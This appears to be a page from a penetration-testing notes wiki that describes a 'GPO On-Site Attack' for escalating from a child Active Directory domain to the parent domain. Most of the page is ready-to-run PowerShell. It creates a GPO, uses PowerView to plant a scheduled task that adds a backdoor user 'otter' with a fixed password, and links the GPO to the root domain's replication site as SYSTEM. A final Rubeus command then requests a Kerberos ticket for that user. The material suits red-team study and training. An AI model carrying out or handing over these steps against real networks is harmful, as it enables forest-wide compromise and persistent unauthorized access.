# GPO On-Site Attack

This technique can be used to move from the child domain to the parent one. The steps are the following:

1. Create a malicious GPO on the Child DC.
2. Query the Root Domain to identify the `replication site` of the `Root Domain`.
3. Link the `created` GPO to the `Default Replication` Site of the Root DC as `SYSTEM`
4. Upon completion of replication, confirm the presence of the created GPO within the `Root DC`.

We'll start by creating a GPO

```powershell
$gpo = "Something"
New-GPO $gpo
```

With that set up we'll create a scheduled task inside that GPO that will add a new user

{% code overflow="wrap" %}

```powershell
Import-Module .\PowerView_2.ps1
New-GPOImmediateTask -Verbose -Force -TaskName 'Something' -GPODisplayName "Something" -Command C:\Windows\System32\cmd.exe -CommandArguments "/c net user otter SomethingSecure123! /add"
```

{% endcode %}

We can verify if the task has been added as we also have to make sure to set the `Run a new instance in parallel` option

  

<figure><img src="https://i.imgur.com/jbIMHr3.png" alt=""><figcaption></figcaption></figure>

<figure><img src="https://i.imgur.com/KeNAEUB.png" alt=""><figcaption></figcaption></figure>

After this, it's time to link the GPO to the `Default Replication` Site of the Root DC: to this we first have to retrieve the site

```powershell
Get-ADDomainController -Server domain.com | Select ServerObjectDN
```

and then link the GPO to it with a `SYSTEM` shell

```powershell
$sitePath = "CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=DOMAIN,DC=COM"
New-GPLink -Name "Something" -Target $sitePath -Server dev.domain.com
```

Now we can wait for the task to run and request a TGT for the backdoored user on the parent DC.

{% hint style="info" %}
The target might need to be reset after the scheduled task ran.
{% endhint %}

{% code overflow="wrap" %}

```powershell
.\Rubeus.exe asktgt /user:otter /password:'SomethingSecure123!' /domain:domain.com /ptt
```

{% endcode %}